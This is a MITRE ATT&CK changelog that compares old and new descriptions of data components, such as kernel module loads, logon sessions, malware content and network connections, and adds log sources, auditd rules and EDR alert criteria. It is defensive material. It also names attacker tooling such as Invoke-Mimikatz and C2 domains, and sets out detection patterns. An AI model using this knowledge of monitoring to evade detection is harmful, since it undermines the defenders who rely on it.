- AWS: instance modifications include API actions like `ModifyInstanceAttribute`, `ModifyInstanceMetadataOptions`, or `RebootInstances`.
- Azure: modifications can be tracked through operations like `Microsoft.Compute/virtualMachines/write`.
- GCP: instance modification events include operations like `instances.setMetadata`, `instances.addResourcePolicies`, or `instances.resize`.
*Data Collection Measures:*
- AWS CloudTrail: Log Location: Stored in S3 or forwarded to CloudWatch.
- Azure Activity Logs: Log Location: Accessible via Azure Monitor or exported to a storage account.
- GCP Audit Logs: Log Location: Logs Explorer or BigQuery. |
| x_mitre_version | 1.0 | 1.1 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Instance: Instance Start
Current version: 1.1
Version changed from: 1.0 → 1.1
|
|
|---|
| t | Activation or invocation of an instance (ex: instance.start | t | The initiation or activation of a virtual machine instance w |
| within GCP Audit Logs) | | ithin a cloud infrastructure. This action typically involves |
| | | starting an existing instance that had been stopped or paus |
| | | ed, allowing it to resume operation. Examples: - Google Cl |
| | | oud Platform (GCP): Starting an instance through `instance.s |
| | | tart` API activity. - AWS: Logging of `StartInstances` in AW |
| | | S CloudTrail for EC2 instances. - Azure: `Microsoft.Compute/ |
| | | virtualMachines/start` entries indicate a VM instance being |
| | | started. *Data Collection Measures:* - Google Cloud Platfo |
| | | rm: Enable GCP Audit Logs for Compute Engine. - Log Even |
| | | t: Look for instance.start entries in Cloud Logging. - Amazo |
| | | n Web Services (AWS): AWS CloudTrail. - Log Event: Searc |
| | | h for StartInstances events associated with EC2. - Microsoft |
| | | Azure: Azure Activity Logs. - Log Event: Filter for Mic |
| | | rosoft.Compute/virtualMachines/start operations. |
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| revoked | | False |
| x_mitre_deprecated | | False |
| x_mitre_domains | | ['enterprise-attack'] |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-10-20T15:05:19.274Z | 2025-04-18T15:13:11.135Z |
| description | Activation or invocation of an instance (ex: instance.start within GCP Audit Logs) | The initiation or activation of a virtual machine instance within a cloud infrastructure. This action typically involves starting an existing instance that had been stopped or paused, allowing it to resume operation. Examples:
- Google Cloud Platform (GCP): Starting an instance through `instance.start` API activity.
- AWS: Logging of `StartInstances` in AWS CloudTrail for EC2 instances.
- Azure: `Microsoft.Compute/virtualMachines/start` entries indicate a VM instance being started.
*Data Collection Measures:*
- Google Cloud Platform: Enable GCP Audit Logs for Compute Engine.
- Log Event: Look for instance.start entries in Cloud Logging.
- Amazon Web Services (AWS): AWS CloudTrail.
- Log Event: Search for StartInstances events associated with EC2.
- Microsoft Azure: Azure Activity Logs.
- Log Event: Filter for Microsoft.Compute/virtualMachines/start operations. |
| x_mitre_version | 1.0 | 1.1 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Instance: Instance Stop
Current version: 1.1
Version changed from: 1.0 → 1.1
|
|
|---|
| t | Deactivation or stoppage of an instance (ex: instance.stop w | t | The deactivation or shutdown of a virtual machine instance w |
| ithin GCP Audit Logs) | | ithin a cloud infrastructure. This action typically involves |
| | | stopping a running instance, which halts its operation and |
| | | releases certain associated resources, such as CPU and memor |
| | | y. Examples: - Google Cloud Platform (GCP): `instance.stop |
| | | ` events recorded in GCP Audit Logs indicate the deactivatio |
| | | n of an instance. - Amazon Web Services (AWS): `StopInstance |
| | | s` actions in AWS CloudTrail indicate EC2 instances being st |
| | | opped. - Microsoft Azure: `Microsoft.Compute/virtualMachines |
| | | /deallocate` or `stop` events in Azure Activity Logs represe |
| | | nt a virtual machine being stopped or deallocated. |
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| revoked | | False |
| x_mitre_deprecated | | False |
| x_mitre_domains | | ['enterprise-attack'] |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-10-20T15:05:19.274Z | 2025-04-18T15:13:04.794Z |
| description | Deactivation or stoppage of an instance (ex: instance.stop within GCP Audit Logs) | The deactivation or shutdown of a virtual machine instance within a cloud infrastructure. This action typically involves stopping a running instance, which halts its operation and releases certain associated resources, such as CPU and memory. Examples:
- Google Cloud Platform (GCP): `instance.stop` events recorded in GCP Audit Logs indicate the deactivation of an instance.
- Amazon Web Services (AWS): `StopInstances` actions in AWS CloudTrail indicate EC2 instances being stopped.
- Microsoft Azure: `Microsoft.Compute/virtualMachines/deallocate` or `stop` events in Azure Activity Logs represent a virtual machine being stopped or deallocated. |
| x_mitre_version | 1.0 | 1.1 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Kernel: Kernel Module Load
Current version: 1.1
Version changed from: 1.0 → 1.1
|
|
|---|
| t | An object file that contains code to extend the running kern | t | The process of loading a kernel module into the operating sy |
| el of an OS, typically used to add support for new hardware | | stem kernel. Kernel modules are object files that extend the |
| (as device drivers) and/or filesystems, or for adding system | | kernel’s functionality, such as adding support for device d |
| calls | | rivers, new filesystems, or additional system calls. This ac |
| | | tion can be legitimate (e.g., loading a driver) or malicious |
| | | (e.g., adding a rootkit). *Data Collection Measures:* - |
| | | Linux: - Auditd: Enable auditing of kernel module loadin |
| | | g. Example rule: `-a always,exit -F arch=b64 -S init_module, |
| | | delete_module`. - Syslog: Monitor `/var/log/syslog` or ` |
| | | /var/log/messages` for entries related to kernel module load |
| | | s. - Systemd Journal: Use `journalctl` to query logs for |
| | | module loading events: `journalctl -k | grep "Loading kerne |
| | | l module"` - macOS: - Unified Logs: Use the `log` comman |
| | | d to query kernel module events: `log show --predicate 'even |
| | | tMessage contains "kextload"' --info` - Endpoint Securit |
| | | y Framework (ESF): Monitor for `ES_EVENT_TYPE_AUTH_KEXTLOAD` |
| | | (kernel extension loading events). - Kernel-Specific Tools: |
| | | - Lsmod: Use `lsmod` to list loaded kernel modules in r |
| | | eal-time. - Kprobe/eBPF: Use extended Berkeley Packet Fi |
| | | lter (eBPF) or Kernel Probes (kprobes) to monitor kernel eve |
| | | nts, including module loading. Example using eBPF tools like |
| | | BCC: `sudo python /path/to/bcc/tools/kprobe -v do_init_modu |
| | | le` - Enable EDR Monitoring: - Configure alerts for: Sus |
| | | picious kernel module loads from non-standard paths (e.g., / |
| | | tmp). Unexpected or unsigned kernel modules. - Review de |
| | | tailed telemetry data provided by the EDR for insight into w |
| | | ho initiated the module load, the file path, and whether the |
| | | module was signed. |
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| revoked | | False |
| x_mitre_deprecated | | False |
| x_mitre_domains | | ['enterprise-attack'] |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-10-20T15:05:19.272Z | 2025-04-18T15:16:44.099Z |
| description | An object file that contains code to extend the running kernel of an OS, typically used to add support for new hardware (as device drivers) and/or filesystems, or for adding system calls | The process of loading a kernel module into the operating system kernel. Kernel modules are object files that extend the kernel’s functionality, such as adding support for device drivers, new filesystems, or additional system calls. This action can be legitimate (e.g., loading a driver) or malicious (e.g., adding a rootkit).
*Data Collection Measures:*
- Linux:
- Auditd: Enable auditing of kernel module loading. Example rule: `-a always,exit -F arch=b64 -S init_module,delete_module`.
- Syslog: Monitor `/var/log/syslog` or `/var/log/messages` for entries related to kernel module loads.
- Systemd Journal: Use `journalctl` to query logs for module loading events: `journalctl -k | grep "Loading kernel module"`
- macOS:
- Unified Logs: Use the `log` command to query kernel module events: `log show --predicate 'eventMessage contains "kextload"' --info`
- Endpoint Security Framework (ESF): Monitor for `ES_EVENT_TYPE_AUTH_KEXTLOAD` (kernel extension loading events).
- Kernel-Specific Tools:
- Lsmod: Use `lsmod` to list loaded kernel modules in real-time.
- Kprobe/eBPF: Use extended Berkeley Packet Filter (eBPF) or Kernel Probes (kprobes) to monitor kernel events, including module loading. Example using eBPF tools like BCC:
`sudo python /path/to/bcc/tools/kprobe -v do_init_module`
- Enable EDR Monitoring:
- Configure alerts for: Suspicious kernel module loads from non-standard paths (e.g., /tmp). Unexpected or unsigned kernel modules.
- Review detailed telemetry data provided by the EDR for insight into who initiated the module load, the file path, and whether the module was signed. |
| x_mitre_version | 1.0 | 1.1 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Logon Session: Logon Session Creation
Current version: 1.2
Version changed from: 1.1 → 1.2
|
|
|---|
| t | Initial construction of a successful new user logon followin | t | The successful establishment of a new user session following |
| g an authentication attempt. (e.g. Windows EID 4624, /var/lo | | a successful authentication attempt. This typically signifi |
| g/utmp, or /var/log/wmtp) | | es that a user has provided valid credentials or authenticat |
| | | ion tokens, and the system has initiated a session associate |
| | | d with that user account. This data is crucial for tracking |
| | | authentication events and identifying potential unauthorized |
| | | access. Examples: - Windows Systems - Event ID: 4624 |
| | | - Logon Type: 2 (Interactive) or 10 (Remote Interact |
| | | ive via RDP). - Account Name: JohnDoe - Sour |
| | | ce Network Address: 192.168.1.100 - Authentication P |
| | | ackage: NTLM - Linux Systems - /var/log/utmp or /var/log |
| | | /wtmp: - Log format: login user [tty] from [source_i |
| | | p] - User: jane - IP: 10.0.0.5 - Tim |
| | | estamp: 2024-12-28 08:30:00 - macOS Systems - /var/log/a |
| | | sl.log or unified logging framework: - Log: com.appl |
| | | e.securityd: Authentication succeeded for user 'admin' - Clo |
| | | ud Environments - Azure Sign-In Logs: - Activity |
| | | : Sign-in successful - Client App: Browser - |
| | | Location: Unknown (Country: X) - Google Workspace - Act |
| | | ivity: Login - Event Type: successful_login |
| | | - Source IP: 203.0.113.55 This data component can be collec |
| | | ted through the following measures: - Windows Systems - |
| | | Event Logs: Monitor Security Event Logs using Event ID 4624 |
| | | for successful logons. - PowerShell Example: `Get-Event |
| | | Log -LogName Security -InstanceId 4624` - Linux Systems |
| | | - Log Files: Monitor `/var/log/utmp`, `/var/log/wtmp`, or `/ |
| | | var/log/auth.log` for logon events. - Tools: Use `last` |
| | | or `who` commands to parse login records. - macOS Systems |
| | | - Log Sources: Monitor `/var/log/asl.log` or Apple Unified |
| | | Logs using the `log show` command. - Command Example: ` |
| | | log show --predicate 'eventMessage contains "Authentication |
| | | succeeded"' --info` - Cloud Environments - Azure AD: Use |
| | | Azure Monitor to analyze sign-in logs. Example CLI Query: ` |
| | | az monitor log-analytics query -w <workspace_id> --analytics |
| | | -query "AzureActivity | where ActivityStatus == 'Success' an |
| | | d OperationName == 'Sign-in'"` - Google Workspace: Enabl |
| | | e and monitor Login Audit logs from the Admin Console. - |
| | | Office 365: Use Audit Log Search in Microsoft 365 Security |
| | | & Compliance Center for login-related events. - Network Logs |
| | | - Sources: Network authentication mechanisms (e.g., RAD |
| | | IUS or TACACS logs). - Enable EDR Monitoring: - EDR too |
| | | ls monitor logon session activity, including the creation of |
| | | new sessions. - Configure alerts for: Suspicious logon |
| | | types (e.g., Logon Type 10 for RDP or Type 5 for Service). L |
| | | ogons from unusual locations, accounts, or devices. - Le |
| | | verage EDR telemetry for session attributes like source IP, |
| | | session duration, and originating process. |
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_domains | | ['ics-attack', 'enterprise-attack'] |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-10-07T16:18:20.802Z | 2025-04-18T15:12:26.544Z |
| description | Initial construction of a successful new user logon following an authentication attempt. (e.g. Windows EID 4624, /var/log/utmp, or /var/log/wmtp) | The successful establishment of a new user session following a successful authentication attempt. This typically signifies that a user has provided valid credentials or authentication tokens, and the system has initiated a session associated with that user account. This data is crucial for tracking authentication events and identifying potential unauthorized access. Examples:
- Windows Systems
- Event ID: 4624
- Logon Type: 2 (Interactive) or 10 (Remote Interactive via RDP).
- Account Name: JohnDoe
- Source Network Address: 192.168.1.100
- Authentication Package: NTLM
- Linux Systems
- /var/log/utmp or /var/log/wtmp:
- Log format: login user [tty] from [source_ip]
- User: jane
- IP: 10.0.0.5
- Timestamp: 2024-12-28 08:30:00
- macOS Systems
- /var/log/asl.log or unified logging framework:
- Log: com.apple.securityd: Authentication succeeded for user 'admin'
- Cloud Environments
- Azure Sign-In Logs:
- Activity: Sign-in successful
- Client App: Browser
- Location: Unknown (Country: X)
- Google Workspace
- Activity: Login
- Event Type: successful_login
- Source IP: 203.0.113.55
This data component can be collected through the following measures:
- Windows Systems
- Event Logs: Monitor Security Event Logs using Event ID 4624 for successful logons.
- PowerShell Example: `Get-EventLog -LogName Security -InstanceId 4624`
- Linux Systems
- Log Files: Monitor `/var/log/utmp`, `/var/log/wtmp`, or `/var/log/auth.log` for logon events.
- Tools: Use `last` or `who` commands to parse login records.
- macOS Systems
- Log Sources: Monitor `/var/log/asl.log` or Apple Unified Logs using the `log show` command.
- Command Example: `log show --predicate 'eventMessage contains "Authentication succeeded"' --info`
- Cloud Environments
- Azure AD: Use Azure Monitor to analyze sign-in logs. Example CLI Query: `az monitor log-analytics query -w --analytics-query "AzureActivity | where ActivityStatus == 'Success' and OperationName == 'Sign-in'"`
- Google Workspace: Enable and monitor Login Audit logs from the Admin Console.
- Office 365: Use Audit Log Search in Microsoft 365 Security & Compliance Center for login-related events.
- Network Logs
- Sources: Network authentication mechanisms (e.g., RADIUS or TACACS logs).
- Enable EDR Monitoring:
- EDR tools monitor logon session activity, including the creation of new sessions.
- Configure alerts for: Suspicious logon types (e.g., Logon Type 10 for RDP or Type 5 for Service). Logons from unusual locations, accounts, or devices.
- Leverage EDR telemetry for session attributes like source IP, session duration, and originating process. |
| x_mitre_version | 1.1 | 1.2 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Malware Repository: Malware Content
Current version: 1.2
Version changed from: 1.1 → 1.2
|
|
|---|
| t | Code, strings, and other signatures that compromise a malici | t | Code, strings, signatures, and other identifying characteris |
| ous payload | | tics of a malicious payload stored within a malware reposito |
| | | ry. It includes both static (file-based) and dynamic (behavi |
| | | oral or execution-based) components that can be analyzed for |
| | | threat intelligence, detection, and prevention purposes. Ex |
| | | amples: - Static Analysis: - Executable Code: Analyze b |
| | | inary data to identify unique patterns, obfuscated code, or |
| | | embedded resources. - Strings Extraction: Use tools like |
| | | strings or YARA rules to identify hardcoded URLs, IPs, file |
| | | names, or suspicious function calls. - Signatures: Extra |
| | | ct cryptographic hashes (MD5, SHA256) of files to track know |
| | | n malware variants or detect previously unseen samples. - Dy |
| | | namic Analysis: - Behavioral Observations: Monitor execu |
| | | tion traces to capture API calls, registry modifications, or |
| | | network traffic patterns indicative of malicious behavior. |
| | | - Memory Analysis: Examine memory dumps to uncover injec |
| | | ted code or runtime-decrypted payloads. - Artifacts: Rec |
| | | ord file system changes, process creation events, and comman |
| | | d-line arguments. - Threat Intelligence Integration: - C |
| | | ampaign Attribution: Associate observed code snippets or sig |
| | | natures with known APT campaigns or ransomware families. |
| | | - Indicator Sharing: Share identified Indicators of Comprom |
| | | ise (IOCs) with threat intelligence platforms (e.g., MISP, O |
| | | penCTI). - Examples of Malware Content: - Embedded C2 do |
| | | mains (e.g., malicious-domain.com hardcoded in the payload). |
| | | - Fileless malware indicators, such as PowerShell scrip |
| | | ts invoking Invoke-Mimikatz. - Malware-specific signatur |
| | | es, such as unique PE header values for a particular strain. |
| | | *Data Collection Measures:* - Collection from Public Malw |
| | | are Repositories: - VirusTotal: Obtain samples for stati |
| | | c analysis. - Hybrid Analysis: Gather execution data fro |
| | | m sandbox analysis. - Any.Run: Access interactive malwar |
| | | e execution traces. - MalwareBazaar: Download malware sa |
| | | mples for research and signature generation. - Automate |
| | | data extraction using repository APIs (e.g., VirusTotal API |
| | | for hash lookups or sample retrieval). - Internal Malware La |
| | | bs: - Sandbox Environments: Use dynamic malware analysis |
| | | tools such as Cuckoo Sandbox or Joe Sandbox to execute and |
| | | monitor malware in a controlled environment. Capture runtime |
| | | behavior logs, memory dumps, and file system changes. - |
| | | Reverse Engineering: Disassemble binaries with tools like I |
| | | DA Pro, Ghidra, or Radare2 to identify malicious functionali |
| | | ty and extract code patterns. - EDR/Endpoint Telemetry: |
| | | - Collect samples of malicious binaries or scripts from infe |
| | | cted endpoints using tools like CrowdStrike, Carbon Black, o |
| | | r SentinelOne. - Extract memory-resident payloads from l |
| | | ive systems for analysis. - Threat Intelligence Platforms: |
| | | - Gather contextual metadata for identified malware using |
| | | tools like OpenCTI, Recorded Future, or ThreatConnect. Part |
| | | icipate in intelligence-sharing groups such as ISACs (e.g., |
| | | FS-ISAC, IT-ISAC). - Custom Data Collection Pipelines: Use o |
| | | pen-source tools like malwoverview or Maltrail to automate s |
| | | ample downloads, hash extraction, and IOC generation. |
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_domains | | ['enterprise-attack'] |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-10-20T20:19:58.845Z | 2025-04-18T15:16:12.329Z |
| description | Code, strings, and other signatures that compromise a malicious payload | Code, strings, signatures, and other identifying characteristics of a malicious payload stored within a malware repository. It includes both static (file-based) and dynamic (behavioral or execution-based) components that can be analyzed for threat intelligence, detection, and prevention purposes. Examples:
- Static Analysis:
- Executable Code: Analyze binary data to identify unique patterns, obfuscated code, or embedded resources.
- Strings Extraction: Use tools like strings or YARA rules to identify hardcoded URLs, IPs, filenames, or suspicious function calls.
- Signatures: Extract cryptographic hashes (MD5, SHA256) of files to track known malware variants or detect previously unseen samples.
- Dynamic Analysis:
- Behavioral Observations: Monitor execution traces to capture API calls, registry modifications, or network traffic patterns indicative of malicious behavior.
- Memory Analysis: Examine memory dumps to uncover injected code or runtime-decrypted payloads.
- Artifacts: Record file system changes, process creation events, and command-line arguments.
- Threat Intelligence Integration:
- Campaign Attribution: Associate observed code snippets or signatures with known APT campaigns or ransomware families.
- Indicator Sharing: Share identified Indicators of Compromise (IOCs) with threat intelligence platforms (e.g., MISP, OpenCTI).
- Examples of Malware Content:
- Embedded C2 domains (e.g., malicious-domain.com hardcoded in the payload).
- Fileless malware indicators, such as PowerShell scripts invoking Invoke-Mimikatz.
- Malware-specific signatures, such as unique PE header values for a particular strain.
*Data Collection Measures:*
- Collection from Public Malware Repositories:
- VirusTotal: Obtain samples for static analysis.
- Hybrid Analysis: Gather execution data from sandbox analysis.
- Any.Run: Access interactive malware execution traces.
- MalwareBazaar: Download malware samples for research and signature generation.
- Automate data extraction using repository APIs (e.g., VirusTotal API for hash lookups or sample retrieval).
- Internal Malware Labs:
- Sandbox Environments: Use dynamic malware analysis tools such as Cuckoo Sandbox or Joe Sandbox to execute and monitor malware in a controlled environment. Capture runtime behavior logs, memory dumps, and file system changes.
- Reverse Engineering: Disassemble binaries with tools like IDA Pro, Ghidra, or Radare2 to identify malicious functionality and extract code patterns.
- EDR/Endpoint Telemetry:
- Collect samples of malicious binaries or scripts from infected endpoints using tools like CrowdStrike, Carbon Black, or SentinelOne.
- Extract memory-resident payloads from live systems for analysis.
- Threat Intelligence Platforms:
- Gather contextual metadata for identified malware using tools like OpenCTI, Recorded Future, or ThreatConnect. Participate in intelligence-sharing groups such as ISACs (e.g., FS-ISAC, IT-ISAC).
- Custom Data Collection Pipelines: Use open-source tools like malwoverview or Maltrail to automate sample downloads, hash extraction, and IOC generation. |
| x_mitre_version | 1.1 | 1.2 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Module: Module Load
Current version: 1.1
Version changed from: 1.0 → 1.1
|
|
|---|
| t | Attaching a module into the memory of a process/program, typ | t | When a process or program dynamically attaches a shared libr |
| ically to access shared resources/features provided by the m | | ary, module, or plugin into its memory space. This action is |
| odule (ex: Sysmon EID 7) | | typically performed to extend the functionality of an appli |
| | | cation, access shared system resources, or interact with ker |
| | | nel-mode components. *Data Collection Measures:* - Event L |
| | | ogging (Windows): - Sysmon Event ID 7: Logs when a DLL i |
| | | s loaded into a process. - Windows Security Event ID 468 |
| | | 8: Captures process creation events, often useful for correl |
| | | ating module loads. - Windows Defender ATP: Can provide |
| | | visibility into suspicious module loads. - Event Logging (Li |
| | | nux/macOS): - AuditD (`execve` and `open` syscalls): Cap |
| | | tures when shared libraries (`.so` files) are loaded. - |
| | | Ltrace/Strace: Monitors process behavior, including library |
| | | calls (`dlopen`, `execve`). - MacOS Endpoint Security Fr |
| | | amework (ESF): Monitors library loads (`ES_EVENT_TYPE_NOTIFY |
| | | _DYLD_INSERT_LIBRARIES`). - Endpoint Detection & Response (E |
| | | DR): - Provide real-time telemetry on module loads and |
| | | process injections. - Sysinternals Process Monitor (`pro |
| | | cmon`): Captures loaded modules and their execution context. |
| | | - Memory Forensics: - Volatility Framework (`malfind`, |
| | | `ldrmodules`): Detects injected DLLs and anomalous module lo |
| | | ads. - Rekall Framework: Useful for kernel-mode module d |
| | | etection. - SIEM and Log Analysis: - Centralized log agg |
| | | regation to correlate suspicious module loads across the env |
| | | ironment. - Detection rules using correlation searches a |
| | | nd behavioral analytics. |
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| revoked | | False |
| x_mitre_deprecated | | False |
| x_mitre_domains | | ['ics-attack', 'enterprise-attack'] |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-10-20T15:05:19.272Z | 2025-04-18T15:12:16.486Z |
| description | Attaching a module into the memory of a process/program, typically to access shared resources/features provided by the module (ex: Sysmon EID 7) | When a process or program dynamically attaches a shared library, module, or plugin into its memory space. This action is typically performed to extend the functionality of an application, access shared system resources, or interact with kernel-mode components.
*Data Collection Measures:*
- Event Logging (Windows):
- Sysmon Event ID 7: Logs when a DLL is loaded into a process.
- Windows Security Event ID 4688: Captures process creation events, often useful for correlating module loads.
- Windows Defender ATP: Can provide visibility into suspicious module loads.
- Event Logging (Linux/macOS):
- AuditD (`execve` and `open` syscalls): Captures when shared libraries (`.so` files) are loaded.
- Ltrace/Strace: Monitors process behavior, including library calls (`dlopen`, `execve`).
- MacOS Endpoint Security Framework (ESF): Monitors library loads (`ES_EVENT_TYPE_NOTIFY_DYLD_INSERT_LIBRARIES`).
- Endpoint Detection & Response (EDR):
- Provide real-time telemetry on module loads and process injections.
- Sysinternals Process Monitor (`procmon`): Captures loaded modules and their execution context.
- Memory Forensics:
- Volatility Framework (`malfind`, `ldrmodules`): Detects injected DLLs and anomalous module loads.
- Rekall Framework: Useful for kernel-mode module detection.
- SIEM and Log Analysis:
- Centralized log aggregation to correlate suspicious module loads across the environment.
- Detection rules using correlation searches and behavioral analytics. |
| x_mitre_version | 1.0 | 1.1 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Named Pipe: Named Pipe Metadata
Current version: 1.1
Version changed from: 1.0 → 1.1
|
|
|---|
| t | Contextual data about a named pipe on a system, including pi | t | Contextual data about a named pipe on a system, including pi |
| pe name and creating process (ex: Sysmon EIDs 17-18) | | pe name and creating process (ex: Sysmon EIDs 17-18) *Data |
| | | Collection Measures:* - Windows: - Sysmon Event ID 17: |
| | | Logs the creation of a named pipe. - Sysmon Event ID 18: |
| | | Logs connection attempts to a named pipe. - Windows Sec |
| | | urity Event ID 5145: Logs access attempts to named pipes via |
| | | SMB shares. - ETW (Event Tracing for Windows): Provides |
| | | deep telemetry into named pipe interactions. - Linux/macOS: |
| | | - AuditD (`mkfifo`, `open`, `read`, `write` syscalls): |
| | | Tracks FIFO (named pipe) creation and usage. - Lsof (`ls |
| | | of -p <PID>` or `lsof | grep PIPE`): Lists active named pipe |
| | | s and associated processes. - Strace (`strace -e open <p |
| | | rocess>`): Monitors named pipe interactions. - Endpoint Dete |
| | | ction & Response (EDR): - Capture named pipe events as p |
| | | art of process tracking. - Memory Forensics: - Volatilit |
| | | y Plugin (`pipescan`): Enumerates named pipes in system memo |
| | | ry. - Rekall Framework: Identifies active named pipes an |
| | | d associated processes. |
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| revoked | | False |
| x_mitre_deprecated | | False |
| x_mitre_domains | | ['enterprise-attack'] |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-10-20T15:05:19.273Z | 2025-04-18T15:14:42.887Z |
| description | Contextual data about a named pipe on a system, including pipe name and creating process (ex: Sysmon EIDs 17-18) | Contextual data about a named pipe on a system, including pipe name and creating process (ex: Sysmon EIDs 17-18)
*Data Collection Measures:*
- Windows:
- Sysmon Event ID 17: Logs the creation of a named pipe.
- Sysmon Event ID 18: Logs connection attempts to a named pipe.
- Windows Security Event ID 5145: Logs access attempts to named pipes via SMB shares.
- ETW (Event Tracing for Windows): Provides deep telemetry into named pipe interactions.
- Linux/macOS:
- AuditD (`mkfifo`, `open`, `read`, `write` syscalls): Tracks FIFO (named pipe) creation and usage.
- Lsof (`lsof -p ` or `lsof | grep PIPE`): Lists active named pipes and associated processes.
- Strace (`strace -e open `): Monitors named pipe interactions.
- Endpoint Detection & Response (EDR):
- Capture named pipe events as part of process tracking.
- Memory Forensics:
- Volatility Plugin (`pipescan`): Enumerates named pipes in system memory.
- Rekall Framework: Identifies active named pipes and associated processes. |
| x_mitre_version | 1.0 | 1.1 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Network Traffic: Network Connection Creation
Current version: 1.2
Version changed from: 1.1 → 1.2
|
|
|---|
| t | Initial construction of a network connection, such as captur | t | The initial establishment of a network session, where a syst |
| ing socket information with a source/destination IP and port | | em or process initiates a connection to a local or remote en |
| (s) (ex: Windows EID 5156, Sysmon EID 3, or Zeek conn.log) | | dpoint. This typically involves capturing socket information |
| | | (source/destination IP, ports, protocol) and tracking sessi |
| | | on metadata. Monitoring these events helps detect lateral mo |
| | | vement, exfiltration, and command-and-control (C2) activitie |
| | | s. *Data Collection Measures:* - Windows: - Event ID 5 |
| | | 156 – Filtering Platform Connection - Logs network connectio |
| | | ns permitted by Windows Filtering Platform (WFP). - Sysm |
| | | on Event ID 3 – Network Connection Initiated - Captures proc |
| | | ess, source/destination IP, ports, and parent process. - Lin |
| | | ux/macOS: - Netfilter (iptables), nftables logs - Tracks |
| | | incoming and outgoing network connections. - AuditD (`c |
| | | onnect` syscall) - Logs TCP, UDP, and ICMP connections. |
| | | - Zeek (`conn.log`) - Captures protocol, duration, and bytes |
| | | transferred. - Cloud & Network Infrastructure: - AWS VP |
| | | C Flow Logs / Azure NSG Flow Logs - Logs IP traffic at the n |
| | | etwork level in cloud environments. - Zeek (conn.log) or |
| | | Suricata (network events) - Captures packet metadata for de |
| | | tection and correlation. - Endpoint Detection & Response (ED |
| | | R): - Detect anomalous network activity such as new C2 c |
| | | onnections or data exfiltration attempts. |
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_domains | | ['ics-attack', 'mobile-attack', 'enterprise-attack'] |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-10-20T20:18:06.745Z | 2025-04-18T15:11:23.639Z |
| description | Initial construction of a network connection, such as capturing socket information with a source/destination IP and port(s) (ex: Windows EID 5156, Sysmon EID 3, or Zeek conn.log) | The initial establishment of a network session, where a system or process initiates a connection to a local or remote endpoint. This typically involves capturing socket information (source/destination IP, ports, protocol) and tracking session metadata. Monitoring these events helps detect lateral movement, exfiltration, and command-and-control (C2) activities.
*Data Collection Measures:*
- Windows:
- Event ID 5156 – Filtering Platform Connection - Logs network connections permitted by Windows Filtering Platform (WFP).
- Sysmon Event ID 3 – Network Connection Initiated - Captures process, source/destination IP, ports, and parent process.
- Linux/macOS:
- Netfilter (iptables), nftables logs - Tracks incoming and outgoing network connections.
- AuditD (`connect` syscall) - Logs TCP, UDP, and ICMP connections.
- Zeek (`conn.log`) - Captures protocol, duration, and bytes transferred.
- Cloud & Network Infrastructure:
- AWS VPC Flow Logs / Azure NSG Flow Logs - Logs IP traffic at the network level in cloud environments.
- Zeek (conn.log) or Suricata (network events) - Captures packet metadata for detection and correlation.
- Endpoint Detection & Response (EDR):
- Detect anomalous network activity such as new C2 connections or data exfiltration attempts. |
| x_mitre_version | 1.1 | 1.2 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Network Share: Network Share Access
Current version: 1.1
Version changed from: 1.0 → 1.1
|
|
|---|
| t | Opening a network share, which makes the contents available | t | Opening a network share, which makes the contents available |
| to the requestor (ex: Windows EID 5140 or 5145) | | to the requestor (ex: Windows EID 5140 or 5145) *Data Colle |
| | | ction Measures:* - Windows: - Event ID 5140 – Network S |
| | | hare Object Access Logs every access attempt to a network sh |
| | | are. - Event ID 5145 – Detailed Network Share Object Acc |
| | | ess Captures granular access control information, including |
| | | the requesting user, source IP, and access permissions. |
| | | - Sysmon Event ID 3 – Network Connection Initiated Helps tra |
| | | ck SMB connections to suspicious or unauthorized network sha |
| | | res. - Enable Audit Policy for Network Share Access: `au |
| | | ditpol /set /subcategory:"File Share" /success:enable /failu |
| | | re:enable` - Enable PowerShell Logging to Detect Unautho |
| | | rized SMB Access: `Set-ExecutionPolicy RemoteSigned` - R |
| | | estrict Network Share Access with Group Policy (GPO): `Compu |
| | | ter Configuration → Windows Settings → Security Settings → L |
| | | ocal Policies → User Rights Assignment` Set "Access this com |
| | | puter from the network" to restrict unauthorized accounts. - |
| | | Linux/macOS: - AuditD (`open`, `read`, `write`, `connec |
| | | t` syscalls) Detects access to NFS, CIFS, and SMB network sh |
| | | ares. - Lsof (`lsof | grep nfs` or `lsof | grep smb`) Id |
| | | entifies active network share connections. - Mount (`mou |
| | | nt | grep nfs` or `mount | grep cifs`) Lists currently mount |
| | | ed network shares. - Enable AuditD for SMB/NFS Access: ` |
| | | auditctl -a always,exit -F arch=b64 -S open -F path=/mnt/sha |
| | | re -k network_share_access` - Monitor Active Network Sha |
| | | res Using Netstat: `netstat -an | grep :445` - Endpoint Dete |
| | | ction & Response (EDR): - Detects abnormal network share |
| | | access behavior, such as unusual account usage, large file |
| | | transfers, or encrypted file activity. |
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| revoked | | False |
| x_mitre_deprecated | | False |
| x_mitre_domains | | ['ics-attack', 'enterprise-attack'] |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-10-20T15:05:19.275Z | 2025-04-18T15:10:01.621Z |
